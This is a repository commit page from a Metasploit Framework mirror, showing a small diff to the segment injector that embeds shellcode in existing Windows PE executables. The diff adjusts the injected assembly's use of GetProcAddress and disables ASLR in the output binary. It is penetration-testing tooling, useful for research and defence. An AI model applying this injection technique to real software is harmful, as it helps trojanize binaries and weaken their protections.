infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Mitigate metasm relocation error by disabling ASLR 

Deal with import error by actually using the GetProcAddress code.
bug/bundler_fix
scriptjunkie 2013-12-07 20:54:13 -06:00
parent 8d33138489
commit 77e9996501
No known key found for this signature in database
GPG Key ID: E89DE255C921A2C6
1 changed files with 3 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/msf/core/exe/segment_injector.rb
View File

@ -37,7 +37,6 @@ module Exe
push hook_funcname push hook_funcname
push eax push eax
call [iat_GetProcAddress] call [iat_GetProcAddress]
mov eax, [iat_CreateThread]
lea edx, [thread_hook] lea edx, [thread_hook]
push 0 push 0
push 0 push 0
@ -85,6 +84,9 @@ module Exe
pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
pe.header.time = pe_orig.header.time pe.header.time = pe_orig.header.time
# Don't rebase if we can help it since Metasm doesn't do relocations well
pe.optheader.dll_characts.delete("DYNAMIC_BASE")
prefix = '' prefix = ''
if pe.header.characteristics.include? "DLL" if pe.header.characteristics.include? "DLL"
# if there is no entry point, just return after we bail or spawn shellcode # if there is no entry point, just return after we bail or spawn shellcode